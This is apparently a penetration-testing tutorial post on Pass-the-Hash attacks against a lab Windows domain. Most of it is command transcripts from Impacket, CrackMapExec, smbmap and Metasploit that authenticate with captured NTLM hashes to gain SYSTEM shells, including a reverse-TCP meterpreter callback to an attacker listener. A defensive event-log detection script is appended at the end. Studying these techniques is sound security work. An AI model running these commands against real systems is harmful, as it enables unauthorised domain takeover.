Domain Penetration Study (1): Windows Authentication Mechanisms
Domain Penetration Study (2): The Kerberos Protocol
Domain Penetration Study (3): Domain Information Gathering
Domain Penetration Study (4): Dump Password & Hash
Domain Penetration Study (5): Remote Connections Based on IPC

PTH: Pass-the-Hash Attack

As covered in the Network Authentication (Net NTLM) section of the earlier Windows Authentication Mechanisms article, once you hold the NTLM Hash of a user on the target machine, you can complete authentication directly with that hash, without cracking it.

For hash extraction, see Domain Penetration Study (4): Dump Password & Hash.

For example, the NTLM Hash obtained here is 4d01fbeeaf2b706478943e0889df5622

Tools that can perform Pass The Hash:

Note that PTH is still implemented on top of an IPC remote connection, so the account-privilege requirements are the same as those described in Domain Penetration Study (5): Remote Connections Based on IPC.

See specifically: the user-privilege issues with IPC connections and Psexec.

impacket

pip3 install impacket
  • psexec.py
psexec.py -hashes :<hash> <domain>/<domain-user>@192.168.10.2

  • smbexec.py
smbexec.py -hashes :<hash> <domain>/<domain-user>@192.168.10.2
PS C:\Users\AresX> smbexec.py -hashes :4d01fbeeaf2b706478943e0889df5622 de1ay/administrator@192.168.10.201
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>
  • wmiexec.py
PS C:\Users\AresX> wmiexec.py -hashes :4d01fbeeaf2b706478943e0889df5622 de1ay/administrator@192.168.10.201 whoami
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] SMBv2.1 dialect used
de1ay\administrator

CrackMapExec

https://github.com/byt3bl33d3r/CrackMapExec/wiki

pip2 install crackmapexec

As of March 2020 the official program does not yet support Python 3.

Installing on Windows additionally requires Microsoft Visual C++ 14.0; installing in a *nix environment is recommended.

Pass-the-hash with CrackMapExec:

aresx@XXXXXXXXXX:~$ cme smb 192.168.10.201 -u administrator -H 4d01fbeeaf2b706478943e0889df5622 -x whoami
CME          192.168.10.201:445 PC              [*] Windows 6.1 Build 7601 (name:PC) (domain:DE1AY)
CME          192.168.10.201:445 PC              [+] DE1AY\administrator 4d01fbeeaf2b706478943e0889df5622 (Pwn3d!)
CME          192.168.10.201:445 PC              [+] Executed command
CME          192.168.10.201:445 PC              de1ay\administrator
[*] KTHXBYE!

Smbmap

https://github.com/ShawnDEvans/smbmap

PS E:\Tools\内网渗透工具集\smbmap> python3 .\smbmap.py -u administrator -d de1ay -p f471ca8ea823361ef9393d97e7a1873c:4d01fbeeaf2b706478943e0889df5622 -H 192.168.10.201
[+] IP: 192.168.10.201:445      Name: PC
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  READ, WRITE     远程管理
        C$                                                      READ, WRITE     默认共享
        IPC$                                                    NO ACCESS       远程 IPC
PS E:\Tools\内网渗透工具集\smbmap>

Smbmap requires the hash in the form LM Hash:NTLM Hash.

Metasploit

The module used is exploit/windows/smb/psexec.

Note that the hash entered here is LM Hash:NTLM Hash.

       =[ metasploit v5.0.21-dev                          ]
+ -- --=[ 1889 exploits - 1065 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

[*] Starting persistent handler(s)...

msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf5 exploit(windows/smb/psexec) > set LPORT 7778
LPORT => 7778
msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.10.201
RHOSTS => 192.168.10.201
msf5 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.10.201   yes       The target address range or CIDR identifier
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser                                no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.10.1     yes       The listen address (an interface may be specified)
   LPORT     7778             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf5 exploit(windows/smb/psexec) > set SMBPass f471ca8ea823361ef9393d97e7a1873c:4d01fbeeaf2b706478943e0889df5622 // LM Hash before the colon, NTLM Hash after it
SMBPass => f471ca8ea823361ef9393d97e7a1873c:4d01fbeeaf2b706478943e0889df5622
msf5 exploit(windows/smb/psexec) > set SMBDomain de1ay
SMBDomain => de1ay
msf5 exploit(windows/smb/psexec) > exploit

[*] Started reverse TCP handler on 192.168.10.1:7778
[*] 192.168.10.201:445 - Connecting to the server...
[*] 192.168.10.201:445 - Authenticating to 192.168.10.201:445|de1ay as user 'Administrator'...
[*] 192.168.10.201:445 - Selecting PowerShell target
[*] 192.168.10.201:445 - Executing the payload...
[+] 192.168.10.201:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 192.168.10.201
[*] Meterpreter session 1 opened (192.168.10.1:7778 -> 192.168.10.201:49482) at 2020-03-10 13:54:44 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
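From the defender's side, an added example that is not part of the original post and not code from any of the tools above: psexec.py, smbexec.py and the Metasploit psexec module all run through a service installed on the target, so on that host a network NTLM logon (Security 4624, logon type 3) is followed within seconds by a service installation (System 7045). The script correlates the two over constructed sample records; the account name on the 7045 record is assumed to have been resolved already from the event's Security UserID SID.

```python
from datetime import datetime, timedelta

FMT = "%Y-%m-%d %H:%M:%S"

# Constructed sample records (not real logs). Only the fields the check uses
# are kept. The "account" on the 7045 record is an assumption: on a real host
# it must be resolved from the SID in the event's System/Security UserID.
SAMPLE_EVENTS = [
    {"id": 4624, "time": "2020-03-10 13:54:40", "account": "DE1AY\\administrator",
     "logon_type": 3, "auth_pkg": "NTLM", "src_ip": "192.168.10.1"},
    {"id": 7045, "time": "2020-03-10 13:54:43", "account": "DE1AY\\administrator",
     "service": "svc_constructed", "image": "C:\\Windows\\Temp\\constructed.exe"},
    # Kerberos network logon with no service install: normal domain activity.
    {"id": 4624, "time": "2020-03-10 14:10:05", "account": "DE1AY\\alice",
     "logon_type": 3, "auth_pkg": "Kerberos", "src_ip": "192.168.10.50"},
    # NTLM network logon on its own: common for file-share access, not alerted.
    {"id": 4624, "time": "2020-03-10 15:00:00", "account": "DE1AY\\bob",
     "logon_type": 3, "auth_pkg": "NTLM", "src_ip": "192.168.10.60"},
]


def ntlm_logon_then_service(events, window=timedelta(seconds=120)):
    """Return one hit per (NTLM network logon, service install) pair where the
    install happens for the same account within `window` after the logon."""
    logons = [e for e in events
              if e["id"] == 4624 and e["logon_type"] == 3
              and e["auth_pkg"].lower() == "ntlm"]
    hits = []
    for svc in (e for e in events if e["id"] == 7045):
        t_svc = datetime.strptime(svc["time"], FMT)
        for lg in logons:
            gap = t_svc - datetime.strptime(lg["time"], FMT)
            if (lg["account"].lower() == svc["account"].lower()
                    and timedelta(0) <= gap <= window):
                hits.append({"account": lg["account"], "src_ip": lg["src_ip"],
                             "service": svc["service"], "image": svc["image"],
                             "seconds_apart": int(gap.total_seconds())})
    return hits


if __name__ == "__main__":
    for h in ntlm_logon_then_service(SAMPLE_EVENTS):
        print("ALERT: NTLM network logon by %(account)s from %(src_ip)s followed "
              "%(seconds_apart)ss later by service %(service)s (%(image)s)" % h)
```

The correlation is what narrows an otherwise noisy NTLM logon signal; it only covers the service-based tools, so wmiexec.py-style execution needs a separate check on WMI process creation.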